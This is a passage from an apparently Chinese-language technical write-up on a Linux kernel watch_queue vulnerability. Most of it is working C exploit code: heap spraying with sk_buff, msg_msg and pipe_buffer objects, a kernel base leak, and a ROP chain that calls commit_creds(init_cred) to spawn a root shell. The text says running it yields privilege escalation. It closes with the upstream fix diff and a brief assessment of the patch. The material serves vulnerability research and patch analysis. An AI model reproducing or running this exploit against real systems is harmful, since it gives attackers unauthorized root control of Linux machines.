    puts("\033[32m\033[1m[+] UAF construction complete!\033[0m");

    /*
     * Step.III
     * spray sk_buff to leak msg_msg addr
     * construct fake msg_msg to leak addr of UAF obj
     */
    puts("\n\033[34m\033[1m[*] Step.III spray sk_buff to leak kheap addr\033[0m");

    // spray sk_buff to construct fake msg_msg
    puts("[*] spray sk_buff...");
    buildMsg((struct msg_msg *)fake_secondary_msg, 
            *(uint64_t*)"arttnba3", *(uint64_t*)"arttnba3", 
            VICTIM_MSG_TYPE, 0x1000 - sizeof(struct msg_msg), 0, 0);
    if (spraySkBuff(sk_sockets, fake_secondary_msg, 
            sizeof(fake_secondary_msg)) < 0)
        errExit("failed to spray sk_buff!");

    // use fake msg_msg to read OOB
    puts("[*] OOB read from victim msg_msg");
    if (peekMsg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0)
        errExit("failed to read victim msg!");

    if (*(int *)&oob_msg.mtext[SECONDARY_MSG_SIZE] != MSG_TAG)
        errExit("failed to rehit the UAF object!");

    nearby_msg = (struct msg_msg*) 
            &oob_msg.mtext[(SECONDARY_MSG_SIZE) - sizeof(struct msg_msg)];

    printf("\033[32m\033[1m[+] addr of primary msg of msg nearby victim: \033[0m%llx\n", 
            nearby_msg->m_list.prev);

    // release and re-spray sk_buff to construct fake msg_msg
    // so that we can make an arbitrary read on a primary msg_msg
    if (freeSkBuff(sk_sockets, fake_secondary_msg, 
            sizeof(fake_secondary_msg)) < 0)
        errExit("failed to release sk_buff!");

    buildMsg((struct msg_msg *)fake_secondary_msg, 
            *(uint64_t*)"arttnba3", *(uint64_t*)"arttnba3", 
            VICTIM_MSG_TYPE, sizeof(oob_msg.mtext), 
            nearby_msg->m_list.prev - 8, 0);
    if (spraySkBuff(sk_sockets, fake_secondary_msg, 
            sizeof(fake_secondary_msg)) < 0)
        errExit("failed to spray sk_buff!");

    puts("[*] arbitrary read on primary msg of msg nearby victim");
    if (peekMsg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0)
        errExit("failed to read victim msg!");

    if (*(int *)&oob_msg.mtext[0x1000] != MSG_TAG)
        errExit("failed to rehit the UAF object!");

    // cal the addr of UAF obj by the header we just read out
    nearby_msg_prim = (struct msg_msg*) 
            &oob_msg.mtext[0x1000 - sizeof(struct msg_msg)];
    victim_addr = nearby_msg_prim->m_list.next - 0x400;

    printf("\033[32m\033[1m[+] addr of msg next to victim: \033[0m%llx\n", 
            nearby_msg_prim->m_list.next);
    printf("\033[32m\033[1m[+] addr of msg UAF object: \033[0m%llx\n", victim_addr);

    /*
     * Step.IV
     * fix the header of UAF obj and release it
     * spray pipe_buffer and leak the kernel base
     */
    puts("\n\033[34m\033[1m[*] Step.IV spray pipe_buffer to leak kernel base\033[0m");

    // re-construct the msg_msg to fix it
    puts("[*] fixing the UAF obj as a msg_msg...");
    if (freeSkBuff(sk_sockets, fake_secondary_msg, 
            sizeof(fake_secondary_msg)) < 0)
        errExit("failed to release sk_buff!");

    memset(fake_secondary_msg, 0, sizeof(fake_secondary_msg));
    buildMsg((struct msg_msg *)fake_secondary_msg, 
            victim_addr + 0x800, victim_addr + 0x800, // a valid kheap addr is valid
            VICTIM_MSG_TYPE, SECONDARY_MSG_SIZE - sizeof(struct msg_msg), 
            0, 0);
    if (spraySkBuff(sk_sockets, fake_secondary_msg, 
            sizeof(fake_secondary_msg)) < 0)
        errExit("failed to spray sk_buff!");

    // release UAF obj as secondary msg
    puts("[*] release UAF obj in message queue...");
    if (readMsg(msqid[victim_qid], &secondary_msg, 
                sizeof(secondary_msg), VICTIM_MSG_TYPE) < 0)
        errExit("failed to receive secondary msg!");

    // spray pipe_buffer
    puts("[*] spray pipe_buffer...");
    for (int i = 0; i < PIPE_NUM; i++)
    {
        if (pipe(pipe_fd[i]) < 0)
            errExit("failed to create pipe!");

        // write something to activate it
        if (write(pipe_fd[i][1], "arttnba3", 8) < 0)
            errExit("failed to write the pipe!");
    }

    // release the sk_buff to read pipe_buffer, leak kernel base
    puts("[*] release sk_buff to read pipe_buffer...");
    pipe_buf_ptr = (struct pipe_buffer *) &fake_secondary_msg;
    for (int i = 0; i < SOCKET_NUM; i++)
    {
        for (int j = 0; j < SK_BUFF_NUM; j++)
        {
            if (read(sk_sockets[i][1], &fake_secondary_msg, 
                    sizeof(fake_secondary_msg)) < 0)
                errExit("failed to release sk_buff!");

            if (pipe_buf_ptr->ops > 0xffffffff81000000)
            {
                printf("\033[32m\033[1m[+] got anon_pipe_buf_ops: \033[0m%llx\n", 
                        pipe_buf_ptr->ops);
                kernel_offset = pipe_buf_ptr->ops - ANON_PIPE_BUF_OPS;
                kernel_base = 0xffffffff81000000 + kernel_offset;
            }
        }
    }

    printf("\033[32m\033[1m[+] kernel base: \033[0m%llx \033[32m\033[1moffset: \033[0m%llx\n", 
            kernel_base, kernel_offset);

    /*
     * Step.V
     * hijack the ops of pipe_buffer
     * free all pipe to trigger fake ptr
     * so that we hijack the RIP
     * construct a ROP on pipe_buffer
     */
    puts("\n\033[34m\033[1m[*] Step.V hijack the ops of pipe_buffer, gain root privilege\033[0m");

    puts("[*] pre-construct data in userspace...");
    pipe_buf_ptr = (struct pipe_buffer *) fake_secondary_msg;
    pipe_buf_ptr->ops = victim_addr;

    ops_ptr = (struct pipe_buf_operations *) fake_secondary_msg;
    ops_ptr->release = 0xffffffff8183b4d3 + kernel_offset;// push rsi ; pop rsp ; add [rbp-0x3d],bl ; ret
    ops_ptr->confirm = 0xffffffff81689ea4 + kernel_offset;// pop rdx ; pop r13 ; pop rbp ; ret

    rop_idx = 0;
    rop_chain = (uint64_t*) &fake_secondary_msg[0x20];
    rop_chain[rop_idx++] = kernel_offset + POP_RDI_RET;
    rop_chain[rop_idx++] = kernel_offset + INIT_CRED;
    rop_chain[rop_idx++] = kernel_offset + COMMIT_CREDS;
    rop_chain[rop_idx++] = kernel_offset + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + 22;
    rop_chain[rop_idx++] = *(uint64_t*) "arttnba3";
    rop_chain[rop_idx++] = *(uint64_t*) "arttnba3";
    rop_chain[rop_idx++] = getRootShell;
    rop_chain[rop_idx++] = user_cs;
    rop_chain[rop_idx++] = user_rflags;
    rop_chain[rop_idx++] = user_sp;
    rop_chain[rop_idx++] = user_ss;

    puts("[*] spray sk_buff to hijack pipe_buffer...");
    if (spraySkBuff(sk_sockets, fake_secondary_msg, 
            sizeof(fake_secondary_msg)) < 0)
        errExit("failed to spray sk_buff!");

    puts("[*] trigger fake ops->release to hijack RIP...");
    for (int i = 0; i < PIPE_NUM; i++)
    {
        close(pipe_fd[i][0]);
        close(pipe_fd[i][1]);
    }
}

运行即可完成提权

该漏洞在内核主线的这个 commit 中被修复，这个 commit 增加的修改比较多，我们主要关注对于该漏洞其改变的部分：

@@ -320,7 +319,7 @@ long watch_queue_set_filter(struct pipe_inode_info *pipe,
            tf[i].info_mask & WATCH_INFO_LENGTH)
            goto err_filter;
        /* Ignore any unknown types */
-       if (tf[i].type >= sizeof(wfilter->type_filter) * 8)
+       if (tf[i].type >= WATCH_TYPE__NR)
            continue;
        nr_filter++;
    }
@@ -336,7 +335,7 @@ long watch_queue_set_filter(struct pipe_inode_info *pipe,

    q = wfilter->filters;
    for (i = 0; i < filter.nr_filters; i++) {
-       if (tf[i].type >= sizeof(wfilter->type_filter) * BITS_PER_LONG)
+       if (tf[i].type >= WATCH_TYPE__NR)
            continue;

        q->type         = tf[i].type;

修复了前后判定不一致的问题
将 type 的范围限定为 WATCH_TYPE__NR（值为 2）

笔者个人认为这个修复还是比较成功的

文章来源: https://xz.aliyun.com/t/11168
如有侵权请联系:admin#unsafe.sh